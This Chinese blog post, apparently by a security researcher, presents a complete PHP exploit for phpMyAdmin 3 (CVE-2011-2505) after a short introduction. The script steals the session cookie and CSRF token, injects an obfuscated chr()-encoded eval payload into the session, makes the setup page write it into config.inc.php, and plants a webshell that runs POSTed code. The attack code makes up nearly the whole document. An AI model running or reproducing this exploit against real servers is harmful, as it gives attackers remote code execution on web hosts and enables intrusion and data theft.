最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是要求 session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问;
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视(从下面的代码可以看到:session id 直接取自 index.php 返回的 phpMyAdmin cookie,注入点用的是 db_create.php 而不是 libraries/ 目录下的文件)。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
// Banner printed on every run.  One array element per output line; the empty
// first and last elements produce the leading and trailing newline.
echo implode("\n", array(
    '',
    '+---------------------------------------------------------------------------+',
    "pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken's ribs)]",
    'by oldjun(www.oldjun.com)',
    'welcome to www.t00ls.net',
    'mail: oldjun@gmail.com',
    'Assigned CVE id: CVE-2011-2505',
    '+---------------------------------------------------------------------------+',
    '',
));
/**
 * Works only when the target's "config" directory exists and is writeable.
 *
 * Command line: php <script> host path.  Arguments beyond the first two are
 * ignored; fewer than two print the usage text and exit.
 */
if ($argc < 3) {
    echo implode("\n", array(
        '',
        '+---------------------------------------------------------------------------+',
        "Usage: php {$argv[0]} host path",
        'host: target server (ip/hostname)',
        'path: path to pma3',
        'Example:',
        "php {$argv[0]} localhost /pma/",
        '+---------------------------------------------------------------------------+',
        '',
    ));
    exit(0);
}

// Positional arguments.  $path is prepended verbatim to every request URL
// by php_request(), so it should end with "/" as in the example above.
list(, $host, $path) = $argv;
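/**
 * Try to determine if the directory "config" exists.
 *
 * Only an HTTP 404 on GET <path>config/ is taken as "missing"; any other
 * status (403 for a forbidden listing, a redirect, 200) passes, as before.
 * Whether the directory is also writeable cannot be told from here and only
 * shows up in the final check.
 */
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
// Inspect the status line only.  The previous strpos($returnstr, '404') test
// matched "404" anywhere in the response (HTML body, a token, a timestamp)
// and could abort against a target whose config/ directory is present.
if (preg_match('#^HTTP/1\.[01] 404\b#', $returnstr)) {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}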
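/**
 * Try to get token and sessionid.
 *
 * A plain GET of index.php is enough: the raw response is searched for a
 * "phpMyAdmin=<32-40 word chars>;" cookie value (presumably from Set-Cookie)
 * followed by the first "token=<32 word chars>&" occurrence; the /s flag lets
 * .*? span the header/body boundary.
 */
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
// Test the match itself rather than the captured values: a failed match
// previously produced undefined-index notices for $resp[1] and $resp[3]
// before falling into the error branch.
if (preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp) !== 1) {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
$sessionid = $resp[1];
$token = $resp[3];
// Report the captured values (the previous lines echoed the literal words
// "token" / "sessionid" instead of the variables).
echo "[+] token $token\n";
echo "[+] Session ID $sessionid\n";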
// Try to insert shell into session.
//
// A single GET to db_create.php carrying the CSRF token and the session
// cookie.  The interesting parameter is _SESSION[ConfigFile][Servers][...][host]:
// its array key is  */eval(<chr chain>);/*  i.e. it closes a PHP comment,
// runs the eval() and opens a new comment, evidently so that it executes
// once it lands inside a comment of the generated config/config.inc.php.
// The chr() chain decodes to
//   fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
// which is what the later "t00ls" marker check and the config/a.php path
// rely on.  Nothing in the query string is URL-encoded; whether the "*", "/",
// "(" and ";" survive a given server or proxy untouched is not verified here.
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid); // Per the original author, almost any PHP file in the pma3 root works as the request target here.
// Try to create webshell: submit the setup "save" form.  The poisoned session
// travels in the phpMyAdmin cookie; the form fields only need to look like a
// normal save so that setup/config.php writes out config/config.inc.php.
echo "[+] Try to create webshell....\n";
$saveForm = implode('&', array(
    'phpMyAdmin=' . $sessionid,
    'tab_hash=',
    'token=' . $token,
    'check_page_refresh=',
    'DefaultLang=en',
    'ServerDefault=0',
    'eol=unix',
    'submit_save=Save',
));
php_request('setup/config.php', $saveForm, 'phpMyAdmin=' . $sessionid);
// Try to check if the webshell was created successfully: request the generated
// config file.  If the injected code ran, its echo('t00ls') shows up in the
// response; otherwise assume config/ is missing or not writeable.
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (!strpos($content, 't00ls')) {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
echo "[+] Congratulations! Expoilt successfully....\n";
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
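/**
 * Send one HTTP request to $host on port 80 and return the raw response
 * (status line, headers and body) as a single string.
 *
 * Uses the globals $host and $path; $path is prepended verbatim to $url.
 * A non-empty $data makes the request a POST with that form-urlencoded body,
 * otherwise a GET is sent.  A non-empty $cookie is sent as the Cookie header.
 * Plain HTTP on port 80 only: no TLS and no port option.  The response is not
 * parsed at all, so a chunked body comes back with its chunk framing intact;
 * callers only do substring / status-line checks on it.  The script exits if
 * the connection cannot be opened or the request cannot be written.
 *
 * @param string $url    request target relative to $path
 * @param string $data   raw, already-urlencoded POST body ('' for GET)
 * @param string $cookie raw Cookie header value ('' for none)
 * @return string
 */
function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = "$method {$path}{$url} HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    if ($data) {
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length: " . strlen($data) . "\r\n";
    }
    if ($cookie) {
        $packet .= "Cookie: $cookie\r\n";
    }
    // "Connection: Close" makes the server shut the socket after the response,
    // which is what lets the feof() loop below terminate.
    $packet .= "Connection: Close\r\n\r\n";
    if ($data) {
        $packet .= $data;
    }

    // Capture the socket error instead of relying on PHP's warning, and bound
    // the connect so a filtered port does not hang the script.
    $errno = 0;
    $errstr = '';
    $fp = @fsockopen(gethostbyname($host), 80, $errno, $errstr, 10);
    if (!$fp) {
        echo "No response from $host ($errno: $errstr)\n";
        die;
    }

    if (fwrite($fp, $packet) === false) {
        fclose($fp);
        echo "Failed to send request to $host\n";
        die;
    }

    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === false) {
            break;
        }
        $resp .= $chunk;
    }
    // The socket was never closed before; every request leaked a handle.
    fclose($fp);

    return $resp;
}
?>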